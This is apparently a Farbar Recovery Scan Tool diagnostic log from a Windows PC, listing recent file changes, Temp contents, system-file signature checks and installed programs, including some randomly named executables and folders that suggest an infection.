2014-11-27 11:59 - 2014-11-27 11:59 - 00000117 _____ () C:\Windows\system32\netcfg-40248046.txt
2014-11-27 11:59 - 2014-11-27 11:59 - 00000117 _____ () C:\Windows\system32\netcfg-40247437.txt
2014-11-27 00:48 - 2014-11-27 00:48 - 00000117 _____ () C:\Windows\system32\netcfg-80960203.txt
2014-11-26 18:07 - 2014-11-27 00:48 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Iravbypa
2014-11-26 18:03 - 2014-11-30 20:33 - 00000000 ____D () C:\ProgramData\NicwEsray
2014-11-26 02:23 - 2014-11-26 02:23 - 00000117 _____ () C:\Windows\system32\netcfg-276359.txt
2014-11-26 02:18 - 2014-11-26 02:18 - 00000117 _____ () C:\Windows\system32\netcfg-57643953.txt
2014-11-26 00:23 - 2014-11-26 00:23 - 00000117 _____ () C:\Windows\system32\netcfg-50768500.txt
2014-11-26 00:23 - 2014-11-26 00:23 - 00000117 _____ () C:\Windows\system32\netcfg-50768421.txt
2014-11-25 18:46 - 2014-11-26 02:18 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\FrameworkUpdate
2014-11-25 16:44 - 2014-11-25 16:44 - 00000117 _____ () C:\Windows\system32\netcfg-23231437.txt
2014-11-25 16:44 - 2014-11-25 16:44 - 00000117 _____ () C:\Windows\system32\netcfg-23231328.txt
2014-11-25 15:56 - 2014-11-25 15:56 - 00001475 _____ () C:\Users\johnsmith\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google.lnk
2014-11-25 10:54 - 2014-11-25 10:54 - 00000117 _____ () C:\Windows\system32\netcfg-2195375.txt
2014-11-25 10:19 - 2014-11-25 10:19 - 00000117 _____ () C:\Windows\system32\netcfg-125890.txt
2014-11-23 17:33 - 2014-11-23 17:33 - 00000117 _____ () C:\Windows\system32\netcfg-109928343.txt
2014-11-23 17:33 - 2014-11-23 17:33 - 00000117 _____ () C:\Windows\system32\netcfg-109928281.txt
2014-11-23 17:32 - 2014-11-23 17:32 - 00000117 _____ () C:\Windows\system32\netcfg-109871812.txt
2014-11-23 17:32 - 2014-11-23 17:32 - 00000117 _____ () C:\Windows\system32\netcfg-109871734.txt
2014-11-23 15:32 - 2014-11-23 15:32 - 00000117 _____ () C:\Windows\system32\netcfg-102657734.txt
2014-11-23 15:32 - 2014-11-23 15:32 - 00000117 _____ () C:\Windows\system32\netcfg-102657562.txt
2014-11-22 17:17 - 2014-11-22 17:17 - 00000117 _____ () C:\Windows\system32\netcfg-22575437.txt
2014-11-22 11:03 - 2014-11-22 11:03 - 00000117 _____ () C:\Windows\system32\netcfg-137015.txt
2014-11-20 09:44 - 2014-11-20 09:44 - 00000117 _____ () C:\Windows\system32\netcfg-53047234.txt
2014-11-20 07:40 - 2014-11-20 07:40 - 00000117 _____ () C:\Windows\system32\netcfg-45565703.txt
2014-11-20 01:14 - 2014-11-08 04:22 - 00238080 _____ (Microsoft Corporation) C:\Windows\system32\pku2u.dll
2014-11-20 01:14 - 2014-11-08 04:21 - 00827904 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-11-20 01:14 - 2014-11-07 23:57 - 00187904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pku2u.dll
2014-11-20 01:14 - 2014-11-07 23:56 - 00666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-11-20 01:14 - 2014-10-11 01:35 - 00171840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-11-20 01:14 - 2014-10-11 00:44 - 00588288 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll
2014-11-20 01:14 - 2014-10-11 00:43 - 01281536 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-11-20 01:14 - 2014-10-10 22:57 - 00452608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll
2014-11-20 01:14 - 2014-05-29 16:02 - 00439808 _____ (Microsoft Corporation) C:\Windows\system32\lsm.dll
2014-11-20 01:14 - 2014-04-12 02:10 - 00578048 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-11-20 01:14 - 2014-04-12 02:09 - 01043968 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll
2014-11-20 01:14 - 2014-04-12 02:09 - 00208896 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-11-20 01:14 - 2014-04-12 02:09 - 00094720 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-11-20 01:14 - 2014-04-12 02:08 - 00318464 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-11-20 01:14 - 2014-04-12 02:07 - 00020480 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-11-20 01:14 - 2014-04-12 00:23 - 00961536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usercpl.dll
2014-11-20 01:14 - 2014-04-12 00:23 - 00273920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-11-20 01:14 - 2014-04-12 00:23 - 00178688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-11-20 01:14 - 2014-04-12 00:23 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-11-20 01:14 - 2014-04-12 00:22 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-11-20 01:14 - 2014-04-11 23:58 - 00014848 _____ (Microsoft Corporation) C:\Windows\system32\workerdd.dll
2014-11-20 01:14 - 2014-03-03 16:07 - 00570216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2014-11-19 20:57 - 2014-11-19 20:57 - 00000117 _____ () C:\Windows\system32\netcfg-7000390.txt
2014-11-19 20:52 - 2014-11-19 20:52 - 00000117 _____ () C:\Windows\system32\netcfg-6735375.txt
2014-11-19 19:26 - 2014-11-19 19:26 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-11-19 19:26 - 2014-11-19 19:26 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-11-19 13:25 - 2014-11-19 13:25 - 00000117 _____ () C:\Windows\system32\netcfg-14821203.txt
2014-11-19 13:25 - 2014-11-19 13:25 - 00000117 _____ () C:\Windows\system32\netcfg-14820968.txt
2014-11-18 07:57 - 2014-11-18 07:57 - 00000117 _____ () C:\Windows\system32\netcfg-57518609.txt
2014-11-18 07:56 - 2014-11-18 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-57439656.txt
2014-11-14 19:39 - 2014-11-17 15:26 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S03
2014-11-14 19:36 - 2014-11-17 15:26 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S01
2014-11-14 19:34 - 2014-11-17 10:35 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S02
2014-11-14 16:06 - 2014-11-14 16:06 - 00000325 _____ () C:\Users\johnsmith\Desktop\Employee Calendar.url
2014-11-14 13:07 - 2014-11-14 13:07 - 00000117 _____ () C:\Windows\system32\netcfg-696923281.txt
2014-11-13 09:01 - 2014-11-13 09:01 - 00000117 _____ () C:\Windows\system32\netcfg-595764046.txt
2014-11-13 09:01 - 2014-11-13 09:01 - 00000117 _____ () C:\Windows\system32\netcfg-595763968.txt
2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509518703.txt
2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509518593.txt
2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509512187.txt
2014-11-12 09:00 - 2014-11-12 09:00 - 00000117 _____ () C:\Windows\system32\netcfg-509313421.txt
2014-11-12 08:56 - 2014-11-12 08:56 - 00000117 _____ () C:\Windows\system32\netcfg-509068250.txt
2014-11-12 08:56 - 2014-11-12 08:56 - 00000117 _____ () C:\Windows\system32\netcfg-509062265.txt
2014-11-12 02:48 - 2014-09-24 16:29 - 00318976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-11-12 02:48 - 2014-09-24 16:29 - 00072192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll
2014-11-12 02:48 - 2014-09-24 16:01 - 00414208 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-11-12 02:48 - 2014-09-24 16:01 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll
2014-11-12 02:48 - 2014-08-21 16:56 - 01418752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2014-11-12 02:48 - 2014-08-21 16:27 - 01845760 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2014-11-12 02:48 - 2014-08-09 01:30 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2014-11-12 02:48 - 2014-08-09 01:29 - 00144896 _____ (Microsoft Corporation) C:\Windows\system32\tssdisai.dll
2014-11-12 02:47 - 2014-10-23 05:47 - 00079872 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-11-12 02:47 - 2014-10-23 04:04 - 00068096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-11-12 02:47 - 2014-10-18 01:44 - 00778240 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2014-11-12 02:47 - 2014-10-18 00:05 - 00567808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2014-11-12 02:47 - 2014-10-11 00:44 - 03248640 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-11-12 02:47 - 2014-10-10 22:41 - 00713728 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2014-11-12 02:47 - 2014-10-10 22:41 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2014-11-12 02:47 - 2014-10-10 22:05 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2014-11-12 02:47 - 2014-10-10 22:04 - 00713728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2014-11-12 02:47 - 2014-10-02 18:21 - 00522728 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-11-12 02:47 - 2014-10-02 15:29 - 00783872 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-11-12 02:47 - 2014-10-02 15:29 - 00267264 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-11-12 02:47 - 2014-10-02 15:29 - 00169472 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2014-11-12 02:47 - 2014-10-01 16:05 - 04068864 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-11-12 02:47 - 2014-09-12 23:24 - 02233152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2014-11-12 02:47 - 2014-05-02 20:34 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2014-11-12 02:47 - 2012-10-12 01:08 - 00027880 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
2014-11-12 02:47 - 2012-10-11 23:14 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\rfxvmt.dll
2014-11-12 02:46 - 2014-10-25 18:56 - 02237952 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-11-12 02:46 - 2014-10-25 18:56 - 01409536 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-11-12 02:46 - 2014-10-25 18:56 - 00915968 _____ (Microsoft Corporation) C:\Windows\system32\uxtheme.dll
2014-11-12 02:46 - 2014-10-25 18:56 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\UXInit.dll
2014-11-12 02:46 - 2014-10-25 18:56 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-11-12 02:46 - 2014-10-25 18:55 - 19284480 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-11-12 02:46 - 2014-10-25 18:55 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-11-12 02:46 - 2014-10-25 18:55 - 00097280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-11-12 02:46 - 2014-10-25 18:54 - 15399424 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-11-12 02:46 - 2014-10-25 18:54 - 02655232 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-11-12 02:46 - 2014-10-25 18:54 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-11-12 02:46 - 2014-10-25 18:54 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-11-12 02:46 - 2014-10-25 18:54 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-11-12 02:46 - 2014-10-25 18:54 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-11-12 02:46 - 2014-10-25 18:54 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-11-12 02:46 - 2014-10-25 18:53 - 01509376 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-11-12 02:46 - 2014-10-25 17:36 - 01762816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-11-12 02:46 - 2014-10-25 17:35 - 01181696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-11-12 02:46 - 2014-10-25 17:35 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-11-12 02:46 - 2014-10-25 17:35 - 00044032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UXInit.dll
2014-11-12 02:46 - 2014-10-25 17:34 - 13758464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-11-12 02:46 - 2014-10-25 17:34 - 02055168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-11-12 02:46 - 2014-10-25 17:34 - 01441280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-11-12 02:46 - 2014-10-25 17:34 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-11-12 02:46 - 2014-10-25 17:34 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-11-12 02:46 - 2014-10-25 17:34 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-11-12 02:46 - 2014-10-25 17:34 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2014-11-12 02:46 - 2014-10-25 17:34 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-11-12 02:46 - 2014-10-25 17:19 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-11-12 02:46 - 2014-10-25 17:13 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-11-12 02:46 - 2014-10-25 14:48 - 00534528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\uxtheme.dll
2014-11-12 02:46 - 2014-09-21 22:53 - 00035320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdBoot.sys
2014-11-12 02:46 - 2014-09-05 17:46 - 00389176 _____ () C:\Windows\system32\ApnDatabase.xml
2014-11-12 02:46 - 2014-09-02 19:48 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2014-11-12 02:46 - 2014-09-02 19:22 - 00188928 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2014-11-12 02:46 - 2014-08-28 21:17 - 02043392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2014-11-12 02:46 - 2014-08-28 21:17 - 00227328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2014-11-12 02:46 - 2014-08-28 21:04 - 02837504 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2014-11-12 02:46 - 2014-08-28 21:04 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2014-11-12 02:46 - 2014-08-27 23:04 - 00499712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FXSCOMEX.dll
2014-11-12 02:46 - 2014-08-27 23:04 - 00227840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FXSAPI.dll
2014-11-12 02:46 - 2014-08-27 22:59 - 00616448 _____ (Microsoft Corporation) C:\Windows\system32\FXSAPI.dll
2014-11-12 02:46 - 2014-08-27 22:59 - 00609280 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOMEX.dll
2014-11-12 02:46 - 2014-08-27 22:59 - 00432640 _____ (Microsoft Corporation) C:\Windows\system32\FXSTIFF.dll
2014-11-12 02:46 - 2014-08-27 22:59 - 00254976 _____ (Microsoft Corporation) C:\Windows\system32\FXST30.dll
2014-11-12 02:46 - 2014-08-26 15:08 - 00270024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdFilter.sys
2014-11-12 02:46 - 2014-07-24 06:12 - 00328512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys
2014-11-12 02:45 - 2014-10-25 18:55 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-11-12 02:45 - 2014-10-25 18:54 - 03959296 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-11-12 02:45 - 2014-10-25 18:54 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-11-12 02:45 - 2014-10-25 18:54 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-11-12 02:45 - 2014-10-25 18:54 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-11-12 02:45 - 2014-10-25 17:35 - 14368768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-11-12 02:45 - 2014-10-25 17:35 - 00163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-11-12 02:45 - 2014-10-25 17:35 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-11-12 02:45 - 2014-10-25 17:34 - 02861568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-11-12 02:45 - 2014-10-25 17:34 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-11-12 02:45 - 2014-10-25 17:34 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-11-12 02:45 - 2014-10-25 17:34 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-11-10 11:28 - 2014-11-10 11:28 - 00000117 _____ () C:\Windows\system32\netcfg-345340312.txt
2014-11-10 11:28 - 2014-11-10 11:28 - 00000117 _____ () C:\Windows\system32\netcfg-345340234.txt
2014-11-10 08:04 - 2014-11-10 08:04 - 00000117 _____ () C:\Windows\system32\netcfg-333130109.txt
2014-11-10 08:04 - 2014-11-10 08:04 - 00000117 _____ () C:\Windows\system32\netcfg-333127046.txt
2014-11-08 23:43 - 2014-11-08 23:43 - 00000117 _____ () C:\Windows\system32\netcfg-216665062.txt
2014-11-08 23:43 - 2014-11-08 23:43 - 00000117 _____ () C:\Windows\system32\netcfg-216664734.txt
2014-11-08 20:51 - 2014-11-08 20:51 - 00000117 _____ () C:\Windows\system32\netcfg-206372718.txt
2014-11-08 20:51 - 2014-11-08 20:51 - 00000117 _____ () C:\Windows\system32\netcfg-206371781.txt
2014-11-08 18:54 - 2014-11-09 23:10 - 00000000 ____D () C:\Users\johnsmith\Downloads\bosch.s01e01.pilot.720p.webrip.x264-w4f-sample.mkv
2014-11-07 09:27 - 2014-11-07 09:27 - 00000117 _____ () C:\Windows\system32\netcfg-78900203.txt
2014-11-07 09:27 - 2014-11-07 09:27 - 00000117 _____ () C:\Windows\system32\netcfg-78898078.txt
2014-11-07 01:42 - 2014-11-14 11:23 - 00000000 ____D () C:\Users\johnsmith\Downloads\polyphonic spree (1)
2014-11-07 01:34 - 2014-11-07 01:37 - 00000000 ____D () C:\Users\johnsmith\Downloads\polyphonic spree
2014-11-06 11:31 - 2014-11-06 11:31 - 00002560 _____ () C:\Users\johnsmith\AppData\Local\6A815FEA01B.exe
2014-11-06 11:26 - 2014-11-06 11:26 - 00002560 _____ () C:\Users\johnsmith\AppData\Local\EB79B990EB2A.exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-01 09:38 - 2012-07-25 22:26 - 00262144 ___SH () C:\Windows\system32\config\ELAM
2014-12-01 09:36 - 2012-07-26 01:12 - 00000000 ___HD () C:\Windows\ELAMBKUP
2014-12-01 09:35 - 2014-05-08 13:10 - 00000928 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-12-01 09:35 - 2012-07-26 00:28 - 00941114 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-12-01 09:31 - 2014-05-08 13:10 - 00000924 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-12-01 09:29 - 2012-07-26 00:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-01 09:26 - 2012-07-25 22:37 - 00000000 ____D () C:\Windows\servicing
2014-12-01 09:20 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\WinStore
2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ___RD () C:\Windows\ToastData
2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ___RD () C:\Windows\ImmersiveControlPanel
2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-12-01 09:19 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\system32\oobe
2014-12-01 09:18 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-12-01 09:18 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Defender
2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Defender
2014-12-01 09:17 - 2012-07-26 00:52 - 00000000 ____D () C:\Program Files\Windows Journal
2014-12-01 09:14 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Photo Viewer
2014-12-01 09:14 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Photo Viewer
2014-12-01 09:14 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-12-01 09:14 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\system32\Dism
2014-12-01 09:00 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\sru
2014-12-01 08:57 - 2012-07-26 00:59 - 00000000 ____D () C:\Windows\CbsTemp
2014-12-01 08:56 - 2013-01-24 23:13 - 00003598 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2762839642-1568754923-376086736-1001
2014-12-01 08:25 - 2013-01-25 10:20 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\vlc
2014-12-01 07:52 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\NDF
2014-12-01 07:51 - 2012-11-21 00:19 - 00002739 _____ () C:\Windows\system32\RaCoInst.log
2014-12-01 07:28 - 2013-01-25 00:49 - 00000000 ____D () C:\Users\johnsmith\Desktop\giganews
2014-12-01 07:19 - 2013-01-31 21:49 - 00000000 ____D () C:\Users\johnsmith\AppData\Local\CrashDumps
2014-11-30 20:33 - 2012-09-12 18:50 - 00000000 ____D () C:\Windows\en
2014-11-30 19:46 - 2012-07-25 22:26 - 00008192 ___SH () C:\Windows\system32\config\BBI
2014-11-30 19:35 - 2014-04-29 05:42 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Binreader
2014-11-30 18:43 - 2014-09-24 20:10 - 00000000 ____D () C:\Users\johnsmith\Desktop\House Ideas
2014-11-29 09:58 - 2014-08-29 23:18 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\tixati
2014-11-25 16:39 - 2014-05-08 13:10 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-11-25 01:39 - 2014-06-08 18:36 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Youtube Downloader HD
2014-11-25 01:38 - 2014-06-08 18:23 - 00001153 _____ () C:\Users\johnsmith\Desktop\Youtube Downloader HD.lnk
2014-11-25 01:38 - 2014-06-08 18:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Youtube Downloader HD
2014-11-25 01:38 - 2014-06-08 18:23 - 00000000 ____D () C:\Program Files (x86)\Youtube Downloader HD
2014-11-24 09:27 - 2013-01-25 11:22 - 00000000 ____D () C:\Users\johnsmith\Documents\Calibre Library
2014-11-23 08:56 - 2014-02-10 11:26 - 00000000 ____D () C:\Users\johnsmith\Desktop\books to load
2014-11-20 09:59 - 2013-02-15 21:16 - 00000000 ____D () C:\Users\johnsmith\AppData\Local\QuickPar
2014-11-19 14:35 - 2013-01-29 23:17 - 00001891 _____ () C:\Users\johnsmith\Desktop\Mirc searches.txt
2014-11-19 14:20 - 2013-01-24 23:03 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\mIRC
2014-11-19 14:13 - 2013-02-14 23:18 - 00000000 ____D () C:\Users\johnsmith\Documents\My Kindle Content
2014-11-19 13:39 - 2014-10-10 20:59 - 00000273 _____ () C:\Users\johnsmith\Desktop\Monthly Finances.txt
2014-11-14 15:30 - 2014-05-08 13:10 - 00003900 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-11-14 15:30 - 2014-05-08 13:10 - 00003664 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-11-13 18:16 - 2013-01-27 22:53 - 00001701 _____ () C:\Users\johnsmith\Desktop\IMDB.url
2014-11-11 04:53 - 2014-07-01 15:43 - 00000000 ____D () C:\Users\johnsmith\Desktop\Nicole's New Job Search
2014-11-09 09:23 - 2014-04-29 09:48 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\HandBrake
2014-11-07 10:05 - 2013-09-06 09:47 - 00000000 ____D () C:\Windows\Minidump
2014-11-06 11:33 - 2013-01-24 21:18 - 00000000 ____D () C:\Users\johnsmith

Some content of TEMP:
====================
C:\Users\johnsmith\AppData\Local\Temp\syserrfix.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-11-23 23:14

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-11-2014 01
Ran by johnsmith at 2014-11-30 21:08:19
Running from C:\Users\johnsmith\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.01) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.01 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.5.635 - Adobe Systems, Inc.)
Amazon Kindle (HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Amazon Kindle) (Version: - Amazon)
ArcSoft Panorama Maker 6 (HKLM-x32\...\{E9CBC8FA-BF1F-4956-8B75-0D314682FE5F}) (Version: 6.0.0.92 - ArcSoft)
AuthenTec TrueAPI 64-bit (Version: 1.6.0.86 - AuthenTec, Inc.) Hidden
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
